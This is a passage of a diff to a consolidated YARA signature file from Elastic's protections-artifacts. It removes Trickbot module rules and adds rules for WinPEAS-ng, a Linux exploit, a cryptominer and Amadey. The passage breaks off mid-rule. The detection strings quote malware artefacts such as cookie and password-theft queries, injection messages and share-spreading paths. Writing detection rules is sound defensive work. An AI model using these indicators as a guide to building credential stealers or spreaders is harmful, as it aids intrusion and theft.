"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L364-L396" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "844974a2d3266e1f9ba275520c0e8a5d176df69a0ccd5135b99facf798a5d209" - logic_hash = "e5f5cf854ebd0e25fffbd6796217f22223a06937e1cacb33baa105ac41731256" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L117-L145" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "e6a0a0a24c70d69c0aa56063d2db0f5a0fedcda5b96d945ac14520524b1d00fd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d382a99e5eed87cf2eab5e238e445ca0bf7852e40b0dd06a392057e76144699f" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "03803621b6c9856443809889a14f1d2fa217812007878dd6cf9c3dc9e5f78f65" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82531,42 +83069,38 @@ rule ELASTIC_Windows_Trojan_Trickbot_23D77Ae5 : FILE MEMORY os = "windows" strings: - $a1 = "/system32/cmd.exe /c \"start microsoft-edge:{URL}\"" ascii fullword - $a2 = "SELECT name, value, host_key, path, expires_utc, creation_utc, encrypted_value FROM cookies" ascii fullword - $a3 = "attempt %d. Cookies not found" ascii fullword - $a4 = "attempt %d. History not found" ascii fullword - $a5 = "Cookies version is %d (%d)" ascii fullword - $a6 = "attempt %d. Local Storage not found" ascii fullword - $a7 = "str+='xie.com.'+p+'.guid='+'{'+components[i]+'}\\n';" ascii fullword - $a8 = "Browser exec is: %s" ascii fullword - $a9 = "found mozilla key: %s" ascii fullword - $a10 = "Version %d is not supported" ascii fullword - $a11 = "id %d - %s" ascii fullword - $a12 = "prot: %s, scope: %s, port: %d" ascii fullword - $a13 = "***** Send %d bytes to callback from %s *****" ascii fullword - $a14 = "/chrome.exe {URL}" ascii fullword + $win_0 = "ConsoleHost_history.txt" ascii wide + $win_1 = "Interesting files and registry" ascii wide + $win_2 = "Cloud Credentials" ascii wide + $win_3 = "Accessed:{2} -- Size:{3}" ascii wide + $win_4 = "Unattend Files" ascii wide + $win_5 = "Looking for common SAM" ascii wide + $win_6 = "Found installed WSL distribution" ascii wide + $win_7 = "Check skipped, if you want to run it" ascii wide + $win_8 = "Cached GPP Passwords" ascii wide + $win_9 = "[cC][rR][eE][dD][eE][nN][tT][iI][aA][lL]|[pP][aA][sS][sS][wW][oO]" ascii wide condition: - 4 of ($a*) + 5 of them } -rule ELASTIC_Windows_Trojan_Trickbot_5574Be7D : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_57587F8C : FILE MEMORY { meta: - description = "Targets injectDll64 containing injection functionality to steal banking credentials" + description = "WinPEAS detection based on the dotNet binary, Network module" author = "Elastic Security" - id = "5574be7d-7502-4357-8110-2fb4a661b2bd" - date = "2021-03-29" - modified = "2021-08-23" + id = "57587f8c-8fc6-41cc-bcb3-3d1d77c74222" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L398-L432" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8c5c0d27153f60ef8aec57def2f88e3d5f9a7385b5e8b8177bab55fa7fac7b18" - logic_hash = "ed0fc98c5d628ce38b923e1410eaf7a4a65ecffea42bed35314e30c99a52219b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L147-L175" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "175b8b6f9fca189f2fc41f1029ad512db2c8b0e52ea04bfbc3d410d355928ab9" score = 75 quality = 50 tags = "FILE, MEMORY" - fingerprint = "23d9b89917a0fc5aad903595b89b650f6dbb0f82ce28ce8bcc891904f62ccf1b" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "9938c60113963da342dcb7de2252cffbeaa21d36f518e203f19a43da74d85f2d" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82574,44 +83108,38 @@ rule ELASTIC_Windows_Trojan_Trickbot_5574Be7D : FILE MEMORY os = "windows" strings: - $a1 = "webinject64.dll" ascii fullword - $a2 = "Mozilla Firefox version: %s" ascii fullword - $a3 = "socks=127.0.0.1:" ascii fullword - $a4 = "" ascii fullword - $a5 = "" ascii fullword - $a6 = "https://%.*s%.*s" ascii fullword - $a7 = "http://%.*s%.*s" ascii fullword - $a8 = "Chrome version: %s" ascii fullword - $a9 = "IE version real: %s" ascii fullword - $a10 = "IE version old: %s" ascii fullword - $a11 = "Build date: %s %s" ascii fullword - $a12 = "EnumDpostServer" ascii fullword - $a13 = "ESTR_PASS_" ascii fullword - $a14 = "" ascii fullword - $a15 = "" ascii fullword - $a16 = "" ascii fullword + $win_0 = "Network Information" ascii wide + $win_1 = "Network Shares" ascii wide + $win_2 = "Permissions.*" ascii wide + $win_3 = "Network Ifaces and known hosts" ascii wide + $win_4 = "Enumerating IPv4 connections" ascii wide + $win_5 = "Showing only DENY rules" ascii wide + $win_6 = "File Permissions.*|Folder Permissions.*" ascii wide + $win_7 = "DNS cached --limit" ascii wide + $win_8 = "SELECT * FROM win32_networkconnection" ascii wide + $win_9 = "Enumerating Internet settings," ascii wide condition: - 4 of ($a*) + 5 of them } -rule ELASTIC_Windows_Trojan_Trickbot_1473F0B4 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_Cae025B1 : FILE MEMORY { meta: - description = "Targets mailsearcher64.dll module" + description = "WinPEAS detection based on the dotNet binary, Process info module" author = "Elastic Security" - id = "1473f0b4-a6b5-4b19-a07e-83d32a7e44a0" - date = "2021-03-29" - modified = "2021-08-23" + id = "cae025b1-bc2a-4eea-a1c1-c82d6e4fd71f" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L434-L459" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9cfb441eb5c60ab1c90b58d4878543ee554ada2cceee98d6b867e73490d30fec" - logic_hash = "dc13625e58c029c60b8670f8e63cd7786bf3e9705c462f3cbbf5b39e7c02f9a1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L177-L203" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "9c34443cffed43513242321e2170484dbb0d41b251aee8ea640d44da76918122" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "15438ae141a2ac886b1ba406ba45119da1a616c3b2b88da3f432253421aa8e8b" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "3e407824b258ef66ac6883d4c5dd3efeb0f744f8f64b099313cf83e96f9e968a" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82619,35 +83147,36 @@ rule ELASTIC_Windows_Trojan_Trickbot_1473F0B4 : FILE MEMORY os = "windows" strings: - $a1 = "mailsearcher.dll" ascii fullword - $a2 = "%s/%s/%s/send/" wide fullword - $a3 = "Content-Disposition: form-data; name=\"list\"" ascii fullword - $a4 = "no" ascii fullword - $a6 = "=Waitu H" ascii fullword - $a7 = "Content-Length: %d" ascii fullword + $win_0 = "Processes Information" ascii wide + $win_1 = "Interesting Processes -non Microsoft-" ascii wide + $win_2 = "Permissions:.*" ascii wide + $win_3 = "Possible DLL Hijacking.*" ascii wide + $win_4 = "ExecutablePath" ascii wide + $win_5 = "Vulnerable Leaked Handlers" ascii wide + $win_6 = "Possible DLL Hijacking folder:" ascii wide + $win_7 = "Command Line:" ascii wide condition: - 2 of ($a*) + 5 of them } -rule ELASTIC_Windows_Trojan_Trickbot_Dcf25Dde : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_4A9B9603 : FILE MEMORY { meta: - description = "Targets networkDll64.dll module containing functionality to gather network and system information" + description = "WinPEAS detection based on the dotNet binary, Services info module" author = "Elastic Security" - id = "dcf25dde-36c4-4a24-aa2b-0b3f42324918" - date = "2021-03-29" - modified = "2021-08-23" + id = "4a9b9603-7b42-4a85-b66a-7f4ec0013338" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L461-L502" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ba2a255671d33677cab8d93531eb25c0b1f1ac3e3085b95365a017463662d787" - logic_hash = "64d15d92faf0919a8fa1ce6772750cde47eaa24b09cf4243393777334bad9712" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L205-L231" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "8d78483b54d3be6988b1f5df826b8709b7aa2045ff3a3e754c359365d053bb27" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4088ae29cb3b665ccedf69e9d02c1ff58620d4b589343cd4077983b25c5b479f" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "2a7b0e1d850fa6a24f590755ae5610309741e520e4b2bc067f54a8e086444da2" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82655,51 +83184,36 @@ rule ELASTIC_Windows_Trojan_Trickbot_Dcf25Dde : FILE MEMORY os = "windows" strings: - $a1 = "Host Name - %s" wide fullword - $a2 = "Last Boot Up Time - %02u/%02u/%04u %02d.%02d.%02d" wide fullword - $a3 = "Install Date - %02u/%02u/%04u %02d.%02d.%02d" wide fullword - $a4 = "System Directory - %s" wide fullword - $a5 = "OS Version - %s" wide fullword - $a6 = "***PROCESS LIST***" wide fullword - $a7 = "Product Type - Domain Controller" wide fullword - $a8 = "Registered Organization - %s" wide fullword - $a9 = "Product Type - Domain Controller" wide fullword - $a10 = "Build Type - %s" wide fullword - $a11 = "Boot Device - %s" wide fullword - $a12 = "Serial Number - %s" wide fullword - $a13 = "OS Architecture - %s" wide fullword - $a14 = "" ascii fullword - $a4 = "yesyes" ascii fullword - $a9 = "Grab_Passwords_Chrome(): Can't open database" ascii fullword - $a10 = "UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_" - $a11 = "Chrome login db copied" ascii fullword - $a12 = "Skip Chrome login db copy" ascii fullword - $a13 = "Mozilla\\Firefox\\Profiles\\" ascii fullword - $a14 = "Grab_Passwords_Chrome() success" ascii fullword - $a15 = "No password provided by user" ascii fullword - $a16 = "Chrome login db should be copied (copy absent)" ascii fullword - $a17 = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" wide fullword + $win_0 = "Windows Credentials" ascii wide + $win_1 = "Checking Windows Vault" ascii wide + $win_2 = "Identity.*|Credential.*|Resource.*" ascii wide + $win_3 = "Checking Credential manager" ascii wide + $win_4 = "Saved RDP connections" ascii wide + $win_5 = "Recently run commands" ascii wide + $win_6 = "Checking for DPAPI" ascii wide + $win_7 = "Checking for RDCMan" ascii wide + $win_8 = "Looking for saved Wifi credentials" ascii wide + $win_9 = "Looking AppCmd.exe" ascii wide condition: - 4 of ($a*) + 5 of them } -rule ELASTIC_Windows_Trojan_Trickbot_D2110921 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Winpeas_Ng_94474B0B : FILE MEMORY { meta: - description = "Targets shareDll64.dll module containing functionality use to spread Trickbot across local networks" + description = "WinPEAS detection based on the bat script" author = "Elastic Security" - id = "d2110921-b957-49b7-8a26-4c0b7d1d58ad" - date = "2021-03-29" - modified = "2021-08-23" + id = "94474b0b-c3dc-4585-afb3-3afe4c3ec525" + date = "2022-12-21" + modified = "2023-02-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L603-L632" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05ef40f7745db836de735ac73d6101406e1d9e58c6b5f5322254eb75b98d236a" - logic_hash = "39ef17836f29c358f596e0047d582b5f1d1af523c8f6354ac8a783eda9969554" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L323-L351" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" + logic_hash = "e209c9ce1f4b11c5fdeade3298329d62f5cf561403c87077d94b6921e81ffaea" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "55dbbcbc77ec51a378ad2ba8d56cb0811d23b121cacd037503fd75d08529c5b5" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "06e184fb837274271711288994a3e6bfcc2a50472ca05c8af9f1e4d8efd9091d" + threat_name = "Windows.Hacktool.WinPEAS-ng" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -82833,228 +83338,153 @@ rule ELASTIC_Windows_Trojan_Trickbot_D2110921 : FILE MEMORY os = "windows" strings: - $a1 = "module64.dll" ascii fullword - $a2 = "Size - %d kB" ascii fullword - $a3 = "%s - FAIL" wide fullword - $a4 = "%s - SUCCESS" wide fullword - $a5 = "ControlSystemInfoService" ascii fullword - $a6 = "yes" ascii fullword - $a7 = "Copy: %d" wide fullword - $a8 = "Start sc 0x%x" wide fullword - $a9 = "Create sc 0x%x" wide fullword - $a10 = "Open sc %d" wide fullword - $a11 = "ServiceInfoControl" ascii fullword + $win_0 = "Windows local Privilege Escalation Awesome Script" ascii wide + $win_1 = "BASIC SYSTEM INFO" ascii wide + $win_2 = "LAPS installed?" ascii wide + $win_3 = "Check for services restricted from the outside" ascii wide + $win_4 = "CURRENT USER" ascii wide + $win_5 = "hacktricks.xyz" ascii wide + $win_6 = "SERVICE VULNERABILITIES" ascii wide + $win_7 = "DPAPI MASTER KEYS" ascii wide + $win_8 = "Files in registry that may contain credentials" ascii wide + $win_9 = "SAM and SYSTEM backups" ascii wide condition: - 3 of ($a*) + 6 of them } -rule ELASTIC_Windows_Trojan_Trickbot_0114D469 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Pulse_2Bea17E8 : FILE MEMORY { meta: - description = "Targets systeminfo64.dll module containing functionality use to retrieve system information" + description = "Detects Linux Exploit Pulse (Linux.Exploit.Pulse)" author = "Elastic Security" - id = "0114d469-8731-4f4f-8657-49cded5efadb" - date = "2021-03-29" - modified = "2021-08-23" + id = "2bea17e8-2324-4502-9ced-7a45d94099ec" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L634-L667" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "083cb35a7064aa5589efc544ac1ed1b04ec0f89f0e60383fcb1b02b63f4117e9" - logic_hash = "6ca8e73f758d3fa956fe53cc83abb43806359f93df05c42a58e2f394a1a3c117" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Pulse.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c29cb4c2d83127cf4731573a7fac531f90f27799857f5e250b9f71362108f559" + logic_hash = "bc71efa6cc79171666d89fe3e755411ee8032f56ae5bd73e0de440eee5b718ab" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4f1fa072f4ba577d590bb8946ea9b9774aa291cb2406f13be5932e97e8e760c6" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "4d57fb355e7d68ad3da26ff3bade291ebbfa8df5f0727579787e33ebee888d41" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "%s" wide fullword - $a2 = "%s" wide fullword - $a3 = "" wide fullword - $a4 = "" wide fullword - $a5 = "%s%s%s" wide fullword - $a6 = "%s" wide fullword - $a7 = "no2" ascii fullword - $a8 = "%s" wide fullword - $a9 = "%s" wide fullword - $a10 = "" wide fullword - $a11 = "" wide fullword - $a12 = "" wide fullword - $a13 = "SELECT * FROM Win32_Processor" wide fullword - $a14 = "SELECT * FROM Win32_OperatingSystem" wide fullword - $a15 = "SELECT * FROM Win32_ComputerSystem" wide fullword + $a = { 89 E5 48 8D 45 F8 48 89 45 F8 48 8B 45 F8 48 25 00 F0 FF FF 48 } condition: - 6 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Trickbot_07239Dad : FILE MEMORY +rule ELASTIC_Linux_Exploit_Pulse_246E6F31 : FILE MEMORY { meta: - description = "Targets vncDll64.dll module containing remote control VNC functionality" + description = "Detects Linux Exploit Pulse (Linux.Exploit.Pulse)" author = "Elastic Security" - id = "07239dad-7f9e-4b20-a691-d9538405b931" - date = "2021-03-29" - modified = "2021-08-23" + id = "246e6f31-fcfb-474e-9709-a5d7ea6586fd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L669-L703" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "dbd534f2b5739f89e99782563062169289f23aa335639a9552173bedc98bb834" - logic_hash = "231592d1a45798de6d22c922626ca28ef4019bae95d552a0f2822823d8dec384" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Pulse.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c29cb4c2d83127cf4731573a7fac531f90f27799857f5e250b9f71362108f559" + logic_hash = "f6755f10863b78303899cefcd81f609884fbbf2dffabd9219686ed869f2cc7e3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "32d63b8db4307fd67e2c9068e22f843f920f19279c4a40e17cd14943577e7c81" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "e98007a2fa62576e1847cf350283f60f1e4e49585574601ab44b304f391240db" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "C:\\Users\\MaxMikhaylov\\Documents\\Visual Studio 2010\\MMVNC.PROXY\\VNCSRV\\x64\\Release\\VNCSRV.pdb" ascii fullword - $a2 = "vncsrv.dll" ascii fullword - $a3 = "-new -noframemerging http://www.google.com" ascii fullword - $a4 = "IE.HTTP\\shell\\open\\command" ascii fullword - $a5 = "EDGE\\shell\\open\\command" ascii fullword - $a6 = "/K schtasks.exe |more" ascii fullword - $a7 = " " ascii fullword - $a8 = "\\Microsoft Office\\Office16\\outlook.exe" ascii fullword - $a9 = "\\Microsoft Office\\Office11\\outlook.exe" ascii fullword - $a10 = "\\Microsoft Office\\Office15\\outlook.exe" ascii fullword - $a11 = "\\Microsoft Office\\Office12\\outlook.exe" ascii fullword - $a12 = "\\Microsoft Office\\Office14\\outlook.exe" ascii fullword - $a13 = "TEST.TEMP:" ascii fullword - $a14 = "Chrome_WidgetWin" wide fullword - $a15 = "o --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas" ascii fullword - $a16 = "NetServerStart" ascii fullword + $a = { 48 8D 45 F8 48 89 45 F8 48 8B 45 F8 48 25 00 E0 FF FF 48 8B 00 48 89 } condition: - 6 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Trickbot_Fd7A39Af : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Roboto_0B6807F8 : FILE MEMORY { meta: - description = "Targets wormDll64.dll module containing spreading functionality" + description = "Detects Linux Cryptominer Roboto (Linux.Cryptominer.Roboto)" author = "Elastic Security" - id = "fd7a39af-c6ea-4682-a00a-01f775c3bb8d" - date = "2021-03-29" - modified = "2021-08-23" + id = "0b6807f8-49c1-485f-9233-1a14f98935bc" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L705-L739" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d5bb8d94b71d475b5eb9bb4235a428563f4104ea49f11ef02c8a08d2e859fd68" - logic_hash = "15cb286504e6167c78e194488555f565965a03e7714fe16692a115df26985a01" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Roboto.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c2542e399f865b5c490ee66b882f5ff246786b3f004abb7489ec433c11007dda" + logic_hash = "d945c7a23b9f435851f3c998231da615e220c259051cf213186c28f3279be1dd" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "3f2e654f2ffdd940c27caec3faeb4bda24c797a17d0987378e36c1e16fadc772" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "65f373b6e820c2a1fa555182b8e4547bf5853326bdf3746c7592d018dc2ed89f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "module64.dll" ascii fullword - $a2 = "worming.png" wide - $a3 = "Size - %d kB" ascii fullword - $a4 = "[+] %s -" wide fullword - $a5 = "%s\\system32" ascii fullword - $a6 = "[-] %s" wide fullword - $a7 = "yesyes" ascii fullword - $a8 = "*****MACHINE IN WORKGROUP*****" wide fullword - $a9 = "*****MACHINE IN DOMAIN*****" wide fullword - $a10 = "\\\\%s\\IPC$" ascii fullword - $a11 = "Windows 5" ascii fullword - $a12 = "InfMach" ascii fullword - $a13 = "%s x64" wide fullword - $a14 = "%s x86" wide fullword - $a15 = "s(&(objectCategory=computer)(userAccountControl:" wide fullword - $a16 = "------MACHINE IN D-N------" wide fullword + $a = { FB 49 89 CF 4D 0F AF FC 4D 01 DF 4D 89 CB 4C 0F AF D8 4D 01 FB 4D } condition: - 5 of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Trickbot_2D89E9Cd : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Roboto_1F1Cfe9A : FILE MEMORY { meta: - description = "Targets tabDll64.dll module containing functionality using SMB for lateral movement" + description = "Detects Linux Cryptominer Roboto (Linux.Cryptominer.Roboto)" author = "Elastic Security" - id = "2d89e9cd-2941-4b20-ab4e-a487d329ff76" - date = "2021-03-29" - modified = "2021-08-23" + id = "1f1cfe9a-ab4a-423c-a62b-ead6901e2a86" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L741-L785" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3963649ebfabe8f6277190be4300ecdb68d4b497ac5f81f38231d3e6c862a0a8" - logic_hash = "c15833687c2aed55aae0bb5de83c088cb66edeb4ad1964543522f5477c1f1942" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Roboto.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "497a6d426ff93d5cd18cea623074fb209d4f407a02ef8f382f089f1ed3f108c5" + logic_hash = "2171284991b0019379c8d271013a35237c37bc2e13d807caed86f8fb9d2ba418" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e6eea38858cfbbe5441b1f69c5029ff9279e7affa51615f6c91981fe656294fc" - threat_name = "Windows.Trojan.Trickbot" + fingerprint = "8dd9f4a091713b8992abd97474f66fdc7d34b0124f06022ab82942f88f3b330c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "[INJECT] inject_via_remotethread_wow64: pExecuteX64( pX64function, ctx ) failed" ascii fullword - $a2 = "[INJECT] inject_via_remotethread_wow64: VirtualAlloc pExecuteX64 failed" ascii fullword - $a3 = "%SystemRoot%\\system32\\stsvc.exe" ascii fullword - $a4 = "[INJECT] inject_via_remotethread_wow64: pExecuteX64=0x%08p, pX64function=0x%08p, ctx=0x%08p" ascii fullword - $a5 = "DLL and target process must be same architecture" ascii fullword - $a6 = "[INJECT] inject_via_remotethread_wow64: VirtualAlloc pX64function failed" ascii fullword - $a7 = "%SystemDrive%\\stsvc.exe" ascii fullword - $a8 = "Wrote shellcode to 0x%x" ascii fullword - $a9 = "ERROR: %d, line - %d" wide fullword - $a10 = "[INJECT] inject_via_remotethread_wow64: Success, hThread=0x%08p" ascii fullword - $a11 = "GetProcessPEB:EXCEPT" wide fullword - $a12 = "Checked count - %i, connected count %i" wide fullword - $a13 = "C:\\%s\\%s C:\\%s\\%s" ascii fullword - $a14 = "C:\\%s\\%s" ascii fullword - $a15 = "%s\\ADMIN$\\stsvc.exe" wide fullword - $a16 = "%s\\C$\\stsvc.exe" wide fullword - $a17 = "Size - %d kB" ascii fullword - $a18 = "yesyes" ascii fullword - $a9 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" wide fullword + $a1 = { 41 54 55 53 48 83 EC 28 48 8B 1F 4C 8B 66 08 48 8D 7C 24 10 4C } condition: - 5 of ($a*) + any of them } -rule ELASTIC_Windows_Trojan_Trickbot_91516Cf4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Amadey_7Abb059B : FILE MEMORY { meta: - description = "Generic signature used to identify Trickbot module usage" + description = "Detects Windows Trojan Amadey (Windows.Trojan.Amadey)" author = "Elastic Security" - id = "91516cf4-c826-4d5d-908f-e1c0b3bccec5" - date = "2021-03-30" - modified = "2021-08-31" + id = "7abb059b-4001-4eec-8185-1e0497e15062" + date = "2021-06-28" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Trickbot.yar#L874-L896" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6cd0d4666553fd7184895502d48c960294307d57be722ebb2188b004fc1a8066" - logic_hash = "6c0bdd6827bebb337c0012cdb6e931cd96ce2ad61f3764f288b96ff049b2d007" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Amadey.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e" + logic_hash = 